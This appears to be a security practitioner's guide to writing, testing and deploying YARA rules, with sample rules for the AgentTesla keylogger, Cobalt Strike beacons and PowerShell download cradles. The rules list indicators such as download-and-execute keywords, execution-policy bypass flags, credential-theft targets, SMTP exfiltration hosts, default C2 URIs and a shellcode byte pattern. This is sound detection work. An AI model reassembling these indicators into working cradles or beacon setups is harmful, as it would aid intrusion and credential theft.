Overview
YARA is the de facto standard for malware classification and detection. A well-written YARA rule can identify a malware family across samples even when hashes change — by targeting the underlying code patterns, strings, and structural features that threat actors reuse.
This project covers:
- The methodology for authoring effective YARA rules
- Rules developed for malware families and tools observed in regional campaigns
- Testing and validation procedures before deployment
- Integration with SIEM, EDR, and sandbox platforms
YARA Rule Authoring Methodology
Writing a rule that fires on real malware without generating false positives requires a structured approach.
Step 1 — Collect samples
Start with at least 3–5 samples from the same family. Sources:
- MalwareBazaar (abuse.ch) — free, tagged by family
- VirusTotal — search by behaviour or YARA match
- Any.run — pull samples from public sandbox sessions
- Internal SIEM/EDR — malware that actually hit your environment
Step 2 — Static analysis — find unique strings
1
2
3
4
5
6
|
# Extract printable strings from a sample
strings -n 8 sample.exe | sort | uniq > strings_sample1.txt
strings -n 8 sample2.exe | sort | uniq > strings_sample2.txt
# Find strings common to all samples but not in clean binaries
comm -12 strings_sample1.txt strings_sample2.txt > common_strings.txt
|
Strings worth targeting:
- Mutex names (malware often uses a unique mutex to prevent double-execution)
- Registry keys used for persistence
- C2 URL patterns (even partial paths like
/gate.php)
- Custom user-agent strings
- Hardcoded error messages or debug strings
Step 3 — Binary pattern analysis
1
2
3
4
5
6
7
|
# Use radare2 to find unique byte sequences
r2 sample.exe
[0x00401000]> /x 4d5a # Find MZ header
[0x00401000]> pd 20 # Disassemble 20 instructions
# Or use FLOSS for obfuscated string extraction
floss sample.exe > floss_output.txt
|
Step 4 — Write the rule
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
rule Malware_Family_Name {
meta:
description = "Detects [Family] based on mutex, PDB path, and C2 pattern"
author = "Mohammad Al Sayegh"
date = "2026-03-01"
hash1 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
tlp = "WHITE"
mitre_att_ck = "T1059.003, T1547.001"
strings:
$mutex = "Global\\MutexName_12AB" ascii wide
$pdb_path = "C:\\Users\\dev\\malware\\Release\\payload.pdb" ascii
$c2_pattern = "/api/v2/gate?uid=" ascii
$reg_key = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater" ascii wide
$packed_stub = { 55 8B EC 83 EC ?? 53 56 57 E8 ?? ?? ?? ?? }
condition:
uint16(0) == 0x5A4D // MZ header — must be a PE file
and filesize < 5MB
and (
$mutex or $pdb_path or $c2_pattern
or ($reg_key and $packed_stub)
)
}
|
Step 5 — Test before deployment
1
2
3
4
5
6
7
8
9
|
# Test against known-bad samples (should ALL match)
yara -r rule.yar /path/to/malware_samples/
# Test against clean binaries (should produce ZERO matches)
yara -r rule.yar /path/to/clean_windows_binaries/
yara -r rule.yar C:\Windows\System32\
# Test performance (rules with complex regex can be slow)
time yara -r rule.yar /large/file/corpus/
|
Example Rules
Rule 1 — AgentTesla Keylogger
AgentTesla is a widely-used commodity keylogger sold on underground forums. It is frequently weaponised in phishing campaigns targeting the Middle East.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
|
rule AgentTesla_Keylogger {
meta:
description = "Detects AgentTesla keylogger based on SMTP exfil strings and mutex"
author = "Mohammad Al Sayegh"
date = "2026-01-10"
mitre_att_ck = "T1056.001, T1071.003"
reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla"
strings:
// SMTP exfiltration strings — hardcoded in many variants
$smtp1 = "smtp.gmail.com" ascii nocase
$smtp2 = "mail.yahoo.com" ascii nocase
$smtp3 = "smtp.mail.ru" ascii nocase
// Keylogger capability strings
$kl1 = "GetAsyncKeyState" ascii
$kl2 = "[Shift]" ascii
$kl3 = "[Caps Lock]" ascii
$kl4 = "[Backspace]" ascii
// .NET artifact — common namespace
$ns1 = "AgentTesla" ascii wide
$ns2 = "Tesla.Keylogger" ascii wide
// Credential theft targets
$cred1 = "filezilla" ascii nocase
$cred2 = "chrome" ascii nocase
$cred3 = "outlook" ascii nocase
condition:
uint16(0) == 0x5A4D
and filesize < 3MB
and (
($ns1 or $ns2)
or (2 of ($smtp*) and 2 of ($kl*))
or (2 of ($cred*) and 1 of ($kl*))
)
}
|
Rule 2 — Cobalt Strike Beacon (Default Config)
Cobalt Strike is a legitimate penetration testing tool that has been heavily adopted by threat actors. Default configurations leave identifiable artifacts.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
rule CobaltStrike_Beacon_Default {
meta:
description = "Detects Cobalt Strike Beacon with default or near-default configuration"
author = "Mohammad Al Sayegh"
date = "2026-01-22"
mitre_att_ck = "T1071.001, T1573.002"
reference = "https://www.cobaltstrike.com"
strings:
// Default sleep/jitter strings in beacon config
$sleep = "%d (seconds)" ascii
$jitter = "Set %s.Metadata" ascii
// Common default C2 URIs in many leaked/cracked versions
$uri1 = "/updates.rss" ascii
$uri2 = "/dpixel" ascii
$uri3 = "/______util.js" ascii
$uri4 = "/jquery-3.3.1.slim.min.js" ascii
// Beacon shellcode staging pattern
$shellcode = { FC E8 8? 00 00 00 60 89 E5 31 D2 64 8B 52 30 }
// Named pipe for SMB beacon
$pipe = "\\\\.\\pipe\\msagent_" ascii wide
condition:
(uint16(0) == 0x5A4D and filesize < 10MB
and (2 of ($uri*) or ($shellcode and 1 of ($uri*))))
or ($pipe and $shellcode)
}
|
Rule 3 — PowerShell Download Cradle (Generic)
Download cradles are used across many campaigns to pull second-stage payloads. This rule targets common obfuscation patterns.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
|
rule PowerShell_Download_Cradle {
meta:
description = "Detects common PowerShell download cradle patterns used in phishing and initial access"
author = "Mohammad Al Sayegh"
date = "2026-02-05"
mitre_att_ck = "T1059.001, T1105"
strings:
// Invoke-Expression variants (obfuscated)
$iex1 = "IEX" ascii nocase
$iex2 = "Invoke-Expression" ascii nocase
$iex3 = "&([scriptblock]::Create(" ascii nocase
// Download methods
$dl1 = "DownloadString" ascii nocase
$dl2 = "DownloadFile" ascii nocase
$dl3 = "WebClient" ascii nocase
$dl4 = "Net.WebClient" ascii nocase
$dl5 = "Invoke-WebRequest" ascii nocase
// Bypass techniques
$bp1 = "bypass" ascii nocase
$bp2 = "-EncodedCommand" ascii nocase
$bp3 = "Set-ExecutionPolicy" ascii nocase
// Base64 encoded PS is always suspicious
$b64 = /[A-Za-z0-9+\/]{100,}={0,2}/ ascii
condition:
filesize < 500KB
and (
(1 of ($iex*) and 1 of ($dl*))
or (1 of ($iex*) and $b64 and 1 of ($bp*))
or (2 of ($dl*) and 1 of ($bp*))
)
}
|
Testing Framework
Before a rule is deployed to production scanners, it must pass three gates:
1
2
3
4
5
6
7
8
9
|
# Gate 1: True Positive Rate — must match ≥ 95% of known samples
yara rule.yar /samples/family_name/ | wc -l # Should equal sample count
# Gate 2: False Positive Rate — must produce 0 matches on clean corpus
yara rule.yar /corpus/windows_clean/ | wc -l # Must be 0
yara rule.yar /corpus/office_suite/ | wc -l # Must be 0
# Gate 3: Performance — must complete within 500ms per 100MB
time yara rule.yar /test/100mb_file.bin
|
Integrating YARA with Your Stack
CrowdStrike Custom IOA
Upload the YARA rule as a Custom IOC → File Hash (not directly supported) or use the Intel API to correlate hashes matched by your rule against CrowdStrike’s telemetry.
Splunk + YARA via TA
The Splunk YARA TA allows scanning file paths or stream data against YARA rules and generating alerts when a match fires.
Any.run / Cuckoo Sandbox
Both platforms accept YARA rules for automated classification. Add your rules to the Cuckoo signatures/ folder or upload to Any.run’s YARA manager.
MISP
MISP has native YARA rule support. Store rules as yara typed attributes on threat actor or malware family events, and share with your ISAC or trusted partners under appropriate TLP.
All rules are provided for defensive, detection, and research purposes. Contact me at contact@malsayegh.ae to collaborate on detection development.